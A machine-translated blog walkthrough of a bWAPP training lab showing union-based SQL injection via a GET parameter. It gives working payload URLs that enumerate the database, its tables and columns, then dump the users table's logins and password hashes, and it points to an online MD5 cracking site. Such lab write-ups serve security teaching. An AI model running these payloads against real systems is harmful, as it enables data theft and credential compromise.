当前位置:网站首页>SQL Injection (GET/Select)
SQL Injection (GET/Select)
2022-07-03 13:32:00 【this is hhhhp】

Choose a little bit , Observe URL, Only movie The value of is changing , and GET/Search Medium title It should be the same
Look at the type
http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 or 1=1 &action=go1. Check the number of fields
http://192.168.3.95/bWAPP/sqli_2.php?movie=1 order by 7 &action=go2. View displayable fields
http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,2,3,4,5,6,7 &action=go2,3,4,5 Is a displayable field

3. Blast storage
http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,database(),3,4,5,6,7 &action=goLibrary name :bWAPP

4. Explosion meter
http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema=database() &action=goFound that only burst out 1 Tables

use group_concat() Put the watches together
http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database() &action=goThis time there is 5 It's a table. , We need to use it. users

5. Pop field
http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_schema=database() and table_name='users'&action=goWe need to use it. login and password

6. Pop field content
http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,group_concat(login),group_concat(password),4,5,6,7 from bWAPP.users &action=go2 individual

7.MD5 Decrypt https://www.cmd5.com/
边栏推荐
- Task5: multi type emotion analysis
- CVPR 2022 | 美团技术团队精选6篇优秀论文解读
- Swiftui development experience: the five most powerful principles that a programmer needs to master
- Flink code is written like this. It's strange that the window can be triggered (bad programming habits)
- Multi table query of MySQL - multi table relationship and related exercises
- 今日睡眠质量记录77分
- When updating mysql, the condition is a query
- untiy世界边缘的物体阴影闪动,靠近远点的物体阴影正常
- Logback log framework
- 【被动收入如何挣个一百万】
猜你喜欢

Resource Cost Optimization Practice of R & D team

Resolved (error in viewing data information in machine learning) attributeerror: target_ names

MySQL installation, uninstallation, initial password setting and general commands of Linux

Unity EmbeddedBrowser浏览器插件事件通讯

18W word Flink SQL God Road manual, born in the sky

道路建设问题
[email protected] chianxin: Perspective of Russian Ukrainian cyber war - Security confrontation and sanctions g"/>Start signing up CCF C ³- [email protected] chianxin: Perspective of Russian Ukrainian cyber war - Security confrontation and sanctions g

TensorBoard可视化处理案例简析

使用tensorflow进行完整的DNN深度神经网络CNN训练完成图片识别案例

【电脑插入U盘或者内存卡显示无法格式化FAT32如何解决】
随机推荐
Fabric.js 更换图片的3种方法(包括更换分组内的图片,以及存在缓存的情况)
[how to solve FAT32 when the computer is inserted into the U disk or the memory card display cannot be formatted]
顺序表(C语言实现)
刚毕业的欧洲大学生,就能拿到美国互联网大厂 Offer?
71 articles on Flink practice and principle analysis (necessary for interview)
Server coding bug
栈应用(平衡符)
Mycms we media mall v3.4.1 release, user manual update
8皇后问题
Road construction issues
Realize the recognition and training of CNN images, and process the cifar10 data set and other methods through the tensorflow framework
Task6: using transformer for emotion analysis
研发团队资源成本优化实践
使用Tensorflow进行完整的深度神经网络CNN训练完成图片识别案例2
静态链表(数组的下标代替指针)
106. 如何提高 SAP UI5 应用路由 url 的可读性
Annotation and reflection
Flink SQL knows why (VIII): the wonderful way to parse Flink SQL tumble window
Flutter动态化 | Fair 2.5.0 新版本特性
Tutoriel PowerPoint, comment enregistrer une présentation sous forme de vidéo dans Powerpoint?